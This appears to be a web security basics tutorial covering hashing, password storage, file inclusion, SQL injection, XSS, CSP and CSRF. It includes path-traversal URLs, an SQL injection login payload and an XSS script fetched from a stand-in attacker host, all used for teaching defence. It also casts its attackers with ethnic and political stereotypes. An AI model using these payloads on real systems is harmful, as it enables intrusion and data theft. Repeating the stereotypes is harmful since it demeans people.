Web Security Basics
The security of websites has always been an important topic, and in my opinion it’s still somewhat neglected by some developers. We have plenty of new tools, and browsers try harder and harder to protect their users, but it’s still important for a developer to be clear on some basic concepts.
Basics⌗
Hash⌗
Hashing algorithms are basically one-way functions: computing hash(x) is (typically) quick and easy, but inverting it is very slow and expensive, ideally practically impossible. In most cases they map inputs of arbitrary length to fixed-length outputs, with a very low probability of collision.
Hashes are used, for example, for storing passwords or for verifying file/message integrity.
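A minimal sketch using Python's standard hashlib module, with SHA-256 picked as an example algorithm: inputs of any length map to a fixed 64-hex-character digest, and comparing a downloaded file's digest with a published one is the typical integrity check. A fast hash like this is fine for integrity checks, but not on its own for passwords (see Storing passwords below).

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of `data` as a 64-character hex string."""
    return hashlib.sha256(data).hexdigest()

def file_sha256(path: str) -> str:
    """Hash a file in chunks, so large files don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(64 * 1024), b""):
            h.update(chunk)
    return h.hexdigest()

# Any input length produces a fixed-length digest...
print(len(sha256_hex(b"apple")), len(sha256_hex(b"apple" * 100_000)))  # 64 64
# ...and a one-character change gives a completely different digest.
print(sha256_hex(b"apple") == sha256_hex(b"Apple"))  # False
```

To verify a download, compute file_sha256() on it and compare the result with the digest the publisher lists (obtained over a channel you trust).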
Encryption⌗
Two main types: symmetric and asymmetric (public-key) schemes.
Symmetric-key encryption⌗
- quick/easy
- encryption/decryption keys are the same
- both parties need to know the secret (the encryption key) - this is the hard part
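- ECB mode (electronic codebook) - all blocks are simply encrypted with the key, independently of each other
  - identical plaintext blocks produce identical ciphertext blocks, so an attacker can analyze the encrypted data to spot patterns (and reorder or replay blocks) without knowing the key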
- CBC mode (cipher block chaining) - each plaintext block is XORed with the previous ciphertext block before being encrypted, so identical blocks no longer encrypt to the same output
  - an initialization vector (IV) is XORed into the first block; it should be unpredictable (random) for every message
  - much safer than ECB
- examples: DES, 3DES, AES, IDEA, …
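To see why ECB leaks patterns, here is a toy sketch. Python's standard library has no AES, so it swaps in a hypothetical 4-round Feistel "block cipher" built from HMAC-SHA256 (toy_encrypt_block is made up for illustration and is NOT secure); only the mode logic matters here. Two identical plaintext blocks come out as two identical ciphertext blocks in ECB mode, while CBC with a random IV hides the repetition.

```python
import hashlib
import hmac
import os

BLOCK = 16  # block size in bytes (same as AES)
HALF = BLOCK // 2

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    """Hypothetical toy block cipher: a 4-round Feistel network whose round
    function is truncated HMAC-SHA256. Illustration only, NOT secure."""
    left, right = block[:HALF], block[HALF:]
    for i in range(4):
        f = hmac.new(key, bytes([i]) + right, hashlib.sha256).digest()[:HALF]
        left, right = right, _xor(left, f)
    return left + right

def _blocks(data: bytes) -> list:
    # Real code would pad (e.g. PKCS#7); this sketch just requires full blocks.
    if len(data) % BLOCK:
        raise ValueError("plaintext length must be a multiple of the block size")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # ECB: every block is encrypted independently with the same key.
    return b"".join(toy_encrypt_block(key, b) for b in _blocks(plaintext))

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # CBC: XOR each plaintext block with the previous ciphertext block
    # (the IV for the first block) before encrypting it.
    out, prev = [], iv
    for b in _blocks(plaintext):
        prev = toy_encrypt_block(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)

key = os.urandom(32)
msg = b"YELLOW SUBMARINE" * 2  # two identical 16-byte blocks
ecb = ecb_encrypt(key, msg)
cbc = cbc_encrypt(key, os.urandom(BLOCK), msg)
print(ecb[:BLOCK] == ecb[BLOCK:])  # True: the repetition shows through
print(cbc[:BLOCK] == cbc[BLOCK:])  # False (with overwhelming probability)
```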
Asymmetric (public-key) encryption⌗
- more expensive/slow
- key-pairs: public + private keys
- everyone has access to the public key
- key exchange is easy (as long as you can trust the source of the public key; otherwise you are open to MITM attacks)
- can be used to sign content (authentication, integrity, can’t be denied)
- can be used to safely establish symmetric keys (e.g. Diffie-Hellman key exchange in TLS/SSL)
- examples: RSA, DSA, various elliptic-curve based algorithms (ECDSA, EdDSA), …
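A toy sketch of two of the uses listed above, with deliberately tiny textbook numbers (the classic p=61, q=53 RSA example and a p=23, g=5 Diffie-Hellman group). There is no padding and no real key size, so it only illustrates the math; real code should use a vetted library. Signing applies the private exponent to a hash of the message, and anyone holding the public key can check it. In the Diffie-Hellman part, both sides derive the same shared secret without ever sending it.

```python
import hashlib
import secrets

# --- Textbook RSA signature (toy sizes, no padding: NOT secure) ---
p, q = 61, 53
n = p * q                  # public modulus: 3233
phi = (p - 1) * (q - 1)    # 3120
e = 17                     # public exponent
d = pow(e, -1, phi)        # private exponent: 2753 (modular inverse, Python 3.8+)

def _digest_mod_n(message: bytes) -> int:
    # Hash the message and squeeze it into the (tiny) modulus range.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n

def sign(message: bytes) -> int:
    return pow(_digest_mod_n(message), d, n)  # needs the private key

def verify(message: bytes, signature: int) -> bool:
    return pow(signature, e, n) == _digest_mod_n(message)  # public key only

# --- Toy Diffie-Hellman key agreement (tiny group: NOT secure) ---
P, G = 23, 5                      # public parameters
a = secrets.randbelow(P - 2) + 1  # Alice's secret exponent, never sent
b = secrets.randbelow(P - 2) + 1  # Bob's secret exponent, never sent
A = pow(G, a, P)                  # Alice sends A in the clear
B = pow(G, b, P)                  # Bob sends B in the clear
alice_key = pow(B, a, P)          # both sides end up with G^(a*b) mod P
bob_key = pow(A, b, P)

sig = sign(b"transfer 10 EUR to Bob")
print(d, verify(b"transfer 10 EUR to Bob", sig), alice_key == bob_key)  # 2753 True True
```

In TLS the shared secret from the key agreement then feeds the (fast) symmetric cipher.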
User data handling⌗
Cookies⌗
- only sent back to the domain that set them (and its subdomains, if the Domain attribute is set)
- easy to use, stored in the browser
- cannot be trusted entirely, client can modify the data
- HttpOnly: cannot be read/modified by JS (in a standard browser)
- Secure: sent back only over a secure channel (HTTPS)
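For example, with Python's standard http.cookies module a server could emit a session cookie carrying the HttpOnly and Secure flags listed above. The cookie name session and its value are placeholders; the SameSite attribute (see CSRF below) needs Python 3.8+.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"           # placeholder value
cookie["session"]["path"] = "/"
cookie["session"]["httponly"] = True   # not readable via document.cookie
cookie["session"]["secure"] = True     # only sent back over HTTPS
cookie["session"]["samesite"] = "Lax"  # not sent on most cross-site requests
cookie["session"]["max-age"] = 3600    # expires after one hour

# Prints a single "Set-Cookie: session=abc123; ..." header line.
print(cookie.output())
```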
Sessions⌗
- stored on the server side
- the client has only the session id
- if an attacker knows your session id, he might be able to use your session
- session id in URLs
  - rarely used nowadays, but was common in the past
  - easy to steal (especially over HTTP), and it also leaks through shared links, browser history and server logs
- session id in cookies
  - the most common way
  - cookies can be made more secure: HttpOnly, Secure
  - they expire
  - CORS
- you can add extra protection by binding the session to other client-specific data that an attacker cannot easily change (like the IP address)
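A minimal in-memory sketch of the server side, assuming a single process (a real app would use its framework's session store or something like Redis). SessionStore and its methods are hypothetical names. The session id is an unguessable random token, the session expires, and, as the optional extra protection, it is bound to the client's IP address.

```python
import secrets
import time

class SessionStore:
    """Hypothetical in-memory session store (single process only)."""

    def __init__(self, ttl_seconds: int = 1800):
        self.ttl = ttl_seconds
        self._sessions = {}  # session id -> session data

    def create(self, user_id: int, client_ip: str) -> str:
        sid = secrets.token_urlsafe(32)  # 32 random bytes: unguessable
        self._sessions[sid] = {
            "user_id": user_id,
            "ip": client_ip,
            "expires": time.time() + self.ttl,
        }
        return sid  # the only thing the client gets (e.g. in a cookie)

    def get(self, sid: str, client_ip: str):
        data = self._sessions.get(sid)
        if data is None:
            return None
        if time.time() > data["expires"]:
            del self._sessions[sid]  # expired: forget it
            return None
        if data["ip"] != client_ip:
            return None  # id used from another address: treat as stolen
        return data

store = SessionStore()
sid = store.create(user_id=42, client_ip="203.0.113.5")
print(store.get(sid, "203.0.113.5")["user_id"])  # 42
print(store.get(sid, "198.51.100.7"))            # None
```

IP binding is a trade-off: mobile users can legitimately change addresses mid-session.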
Signed cookies⌗
- the data is stored in cookies, BUT it is digitally signed by the server
- can be trusted: the client cannot modify the data without invalidating the signature (it can still read it, though, since signing is not encryption)
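A minimal sketch of signing a cookie value with HMAC-SHA256 from Python's standard library. The value|signature layout and the SECRET_KEY constant are assumptions for illustration; web frameworks ship their own, well-tested implementations. hmac.compare_digest is used so the comparison doesn't leak timing information.

```python
import hashlib
import hmac

SECRET_KEY = b"server-side secret, never sent to the client"  # placeholder

def _signature(value: str) -> str:
    return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()

def sign_cookie(value: str) -> str:
    # The value stays readable by the client; only tampering is prevented.
    return f"{value}|{_signature(value)}"

def read_signed_cookie(cookie: str):
    value, sep, sig = cookie.rpartition("|")
    if not sep or not hmac.compare_digest(sig.encode(), _signature(value).encode()):
        return None  # missing or corrupted signature: reject the data
    return value

c = sign_cookie("user_id=42")
print(read_signed_cookie(c))                                     # user_id=42
print(read_signed_cookie(c.replace("user_id=42", "user_id=1")))  # None
```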
JWT (JSON Web Token)⌗
- basically a standardized version of signed cookies (usually sent in the Authorization header instead of a cookie)
- lots of libraries
- easy SSO (no cookie limitations, can be used cross-domain)
- use with care, via well-tested libraries
  - (even many popular libraries had flaws in the past; if you try to implement it yourself, you will probably get something wrong)
Storing passwords⌗
As plain text⌗
- so, it will be easy to send password reminder emails
- DO NOT EVER
- also, do not send the password by email to newly registered users…
As simple hash⌗
- still no
- rainbow tables - pre-generated searchable list of hashes
Salted hash⌗
- much better, especially with per-password salts
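Even with salts, fast hash algorithms (like MD5 or SHA-256) can be brute-forced very quickly (using GPUs, for example), and generating a rainbow table for a specific salt+algorithm pair is not that expensive either, so you should use deliberately slow hash algorithms.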
Password summary⌗
- use randomly generated salts for each password
- use slow hash algorithms (like Argon2 or bcrypt)
- store the hash algorithm (and its parameters) along with the hash, so it can be upgraded later if a security flaw is discovered in the current one
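Example of the format used on Linux (e.g. in /etc/shadow):
$algid$veryrandomsalt$hashedpassword
Example, using Python's crypt module (Unix only; deprecated in Python 3.11 and removed in 3.13):
>>> import crypt
>>> # 'nem igazi jelszo' is Hungarian for 'not a real password'
>>> # $1$ = MD5
>>> crypt.crypt('nem igazi jelszo', '$1$saltsalt')
'$1$saltsalt$vQbMk4l2lRc5Nr/elLy970'
>>> # $5$ = SHA-256
>>> crypt.crypt('nem igazi jelszo', '$5$saltsalt')
'$5$saltsalt$YgzPiIYuBL6dqAnD1icVdvGnZRxKjm3nb.akiwHaPb3'
>>> # $6$ = SHA-512
>>> crypt.crypt('nem igazi jelszo', '$6$saltsalt')
'$6$saltsalt$5Svv7/14kYtcAMAjbHEQ/J8H.X9RyKNEh8XD2/ppt9MYH57eXgeWQ.o0RJfoovtzlJT1kVEcIDaUKyd8yL6jp1'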
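The password summary above, sketched with Python's standard library. hashlib has no Argon2 or bcrypt, so this swaps in PBKDF2-HMAC-SHA256, which is also a deliberately slow, iterated hash; with a third-party package you would use Argon2 instead. The stored string mimics the $algid$salt$hash layout, but the pbkdf2-sha256 id and the field order are assumptions, not a standard format. The iteration count is only an example value; tune it by measuring on your own hardware.

```python
import base64
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # example work factor: higher = slower to brute-force

def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")

def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    salt = secrets.token_bytes(16)  # fresh random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Store the algorithm id and its parameters next to the hash,
    # so the scheme can be upgraded later.
    return f"$pbkdf2-sha256${iterations}${_b64(salt)}${_b64(digest)}"

def verify_password(password: str, stored: str) -> bool:
    _, algid, iterations, salt_b64, digest_b64 = stored.split("$")
    if algid != "pbkdf2-sha256":
        raise ValueError(f"unsupported algorithm: {algid}")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    return hmac.compare_digest(digest, expected)  # constant-time comparison

stored = hash_password("nem igazi jelszo")
print(verify_password("nem igazi jelszo", stored))  # True
print(verify_password("wrong guess", stored))       # False
```

Because the salt is random, hashing the same password twice gives two different stored strings, which is exactly what defeats precomputed tables.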
File inclusion⌗
Sometimes you have to include files into your application based on data coming from the internet.
NEVER TRUST ANY DATA COMING FROM THE INTERNET.
Best solution: do not do such a thing.
A long time ago in a galaxy far, far away, there was an e-commerce site whose old WebLogic server did not support the SVG content-type. So they created a “page” called svg.jsp that read the file named in a URL parameter and served it with the proper SVG content-type.
Then I sent them the following URL: https://unknownsite.com/svg.jsp?file=../../../../etc/passwd. So they fixed it to serve only files under the WEB-INF folder.
Then I sent them the following URL: https://unknownsite.com/svg.jsp?file=../../web.xml. So they fixed it to accept the file parameter only if it ends with .svg.
Then I sent them the following URL: https://unknownsite.com/svg.jsp?file=../../web.xml%00.svg (the URL-encoded null byte cut the file name short once it reached the file system, so the .svg check passed, but web.xml was served). And I asked them to move the SVG files to a static web server that can set the content-type properly, and to delete that svg.jsp for good. That solved the issue.
If you really need to do something like this, unescape/urldecode properly (using a well tested library/framework), resolve the absolute path and restrict access to a specific directory, and be really careful.
… and DO NOT EVER INCLUDE EXECUTABLE CODE IN THIS WAY!
This used to be a common approach among PHP developers in the early days, and back then PHP even let you include files directly from remote URLs… it was a nightmare (or heaven on Earth, depending on whom you ask).
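A minimal sketch of the "decode, resolve, restrict to one directory" advice in Python (3.9+ for Path.is_relative_to), assuming all allowed files live in a single directory; STATIC_ROOT and safe_svg_path are hypothetical names. It decodes first, rejects null bytes, resolves the full path (collapsing any ../ segments and following symlinks), and only then checks that the result is still inside the allowed directory, so each trick from the story above is rejected. Serving the files from a static web server remains the better fix.

```python
from pathlib import Path
from urllib.parse import unquote

STATIC_ROOT = Path("/srv/static/svg").resolve()  # hypothetical directory

def safe_svg_path(raw_param: str, root: Path = STATIC_ROOT) -> Path:
    name = unquote(raw_param)  # decode once, BEFORE any checks
    if "\x00" in name:
        raise ValueError("null byte in file name")
    # resolve() makes the path absolute, collapses "..", follows symlinks.
    candidate = (root / name).resolve()
    if not candidate.is_relative_to(root):
        raise PermissionError("path escapes the allowed directory")
    if candidate.suffix != ".svg":
        raise PermissionError("only .svg files are served")
    return candidate
```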
SQL injection⌗
Imagine the following code that checks the credentials of a user:
user = SQL("select * from users where email='" + email_from_user_input + "' and password='" + hashed_password_from_user_input + "';");
Regular user input:
{
"email": "alma@beka.com",
"password": "cicaMICA"
}
-> 🎉
Soros funded evil hacker who wants to spread anarchy:
{
"email": "' or user_id=1; --",
"password": "idontcare"
}
-> 😢 (he’s probably logged in as the admin user now, since the admin usually has the first id). Relevant XKCD: “Exploits of a Mom” (Little Bobby Tables).
Use an ORM or at least prepared statements (parameterized queries). Do not try to manually escape data coming from untrusted sources; you’ll fail eventually.
But anyway, NEVER TRUST USER INPUT!
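Here is the login example from above, runnable against an in-memory SQLite database with Python's built-in sqlite3 module (the table layout and sample rows are made up). The string-concatenated query lets the attacker's input rewrite the WHERE clause; the parameterized version passes the exact same input as plain data.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
db.executemany(
    "INSERT INTO users (email, password) VALUES (?, ?)",
    [("admin@example.com", "hash-of-admin-pw"), ("alma@beka.com", "hash-of-cicaMICA")],
)

def find_user_unsafe(email: str, password_hash: str):
    # DON'T: user input becomes part of the SQL text.
    query = ("select * from users where email='" + email +
             "' and password='" + password_hash + "';")
    return db.execute(query).fetchone()

def find_user_safe(email: str, password_hash: str):
    # DO: placeholders keep the input as data, never as SQL.
    return db.execute(
        "SELECT * FROM users WHERE email = ? AND password = ?",
        (email, password_hash),
    ).fetchone()

evil = "' or user_id=1; --"
print(find_user_unsafe(evil, "idontcare"))  # (1, 'admin@example.com', 'hash-of-admin-pw')
print(find_user_safe(evil, "idontcare"))    # None
```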
XSS - Cross Site Scripting⌗
Scenario: Search page, current search term is shown at the top of the page.
Regular user:
- Searches for apple
- Apples are shown (among iPhones and Macs)
Malevolent Eastern European from the dark side of the internet:
- Searches for apple<script src="//h4x0rz.org/evilhackerscripttostealuserdata.js"></script>
- Apples are shown
- Copies the direct link to this page and posts it to a public forum like: “Look they even have iPhones among the apples, lol.”
- Victim clicks on the link, buys an apple using online payment, and a few minutes later buys an iPhone for someone in Poland.
General rules:
- DO NOT TRUST ANY USER INPUT, OR ANYTHING COMING FROM UNTRUSTED SOURCES!
- untrusted source: basically anything that is not written by you. Well, do not even trust that…
- escape everything, using well-tested libraries:
  - HTML escape/sanitize, and carefully escape HTML attributes and CSS rules
  - check OWASP (e.g. its Cross Site Scripting Prevention Cheat Sheet)
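A minimal sketch with Python's standard html.escape, which covers text placed in HTML element content and in quoted attribute values; JavaScript, URL and CSS contexts need their own encoding, which is where a template engine with auto-escaping or an OWASP-recommended library comes in. render_search_header is a hypothetical function for the search-page scenario above.

```python
import html

def render_search_header(term: str) -> str:
    # Escapes &, <, >, " and ' so the term is shown as text, never parsed as markup.
    return f'<h1>Results for "{html.escape(term)}"</h1>'

evil = 'apple<script src="//h4x0rz.org/evilhackerscripttostealuserdata.js"></script>'
print(render_search_header(evil))
# <h1>Results for "apple&lt;script src=&quot;//h4x0rz.org/evilhackerscripttostealuserdata.js&quot;&gt;&lt;/script&gt;"</h1>
```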
CSP - Content Security Policy⌗
CSP helps prevent XSS attacks by telling the browser which sources are valid for each content type. For example, you can allow CSS and JS files only from your own domain, and tell the browser not to execute scripts embedded directly in the page content (inline scripts).
See MDN for details.
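For illustration, a sketch of sending such a policy as a response header from a plain WSGI app; add_csp and hello_app are hypothetical names, and most frameworks have their own way to set headers. With this policy, scripts and styles load only from the page's own origin, inline scripts and styles are not executed, and plugins (object-src) are disabled.

```python
# Only same-origin resources; no inline code (no 'unsafe-inline'), no plugins.
CSP_POLICY = "; ".join([
    "default-src 'self'",
    "script-src 'self'",
    "style-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
])

def add_csp(app):
    """Wrap a WSGI app so every response carries the CSP header."""
    def wrapped(environ, start_response):
        def start_response_with_csp(status, headers, exc_info=None):
            headers = list(headers) + [("Content-Security-Policy", CSP_POLICY)]
            return start_response(status, headers, exc_info)
        return app(environ, start_response_with_csp)
    return wrapped

def hello_app(environ, start_response):
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [b"<h1>Hello</h1>"]

app = add_csp(hello_app)
# To try it locally:
# from wsgiref.simple_server import make_server
# make_server("", 8000, app).serve_forever()
```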
CSRF - Cross Site Request Forgery⌗
A malicious site sends requests to another site, and the browser attaches the current user’s credentials (e.g. cookies) to them.
Example:
- “Press the button to see a funny video!” The button POSTs a request to your web bank to transfer some money to the attacker… and also shows a funny video, so no worries.
Solutions:
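- Check the Origin header (if present)
- if that is not possible, use a CSRF token (a random token bound to the user session, updated on every request) that is required for all state-changing operations
- modern browsers don't let cross-origin AJAX calls read the response, and they send a preflight request first for non-simple calls (e.g. custom headers or JSON bodies), which blocks them by default (see CORS); plain form POSTs are still sent, though
- some modern browsers (e.g. Chrome) also treat cookies without a SameSite attribute as SameSite=Lax by default, which also helps (see Cookies)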
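A minimal, framework-agnostic sketch of the two server-side checks, with hypothetical names (ALLOWED_ORIGINS, the session dict, the csrf_token form field). For brevity the token is generated once per session here; the per-request variant works the same way, just regenerated after each use. The comparison runs in constant time.

```python
import hmac
import secrets

ALLOWED_ORIGINS = {"https://bank.example"}  # hypothetical: your own site's origin

def issue_csrf_token(session: dict) -> str:
    # Keep a random token in the server-side session and embed it in every form.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def is_request_allowed(method: str, headers: dict, form: dict, session: dict) -> bool:
    if method in ("GET", "HEAD", "OPTIONS"):
        return True  # safe methods must not change state anyway
    origin = headers.get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False  # cross-site request: reject early
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    # The attacker's page can make the browser send cookies, but it cannot read this token.
    return expected is not None and hmac.compare_digest(expected.encode(), submitted.encode())
```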
Summary⌗
NEVER TRUST ANYTHING COMING FROM THE INTERNET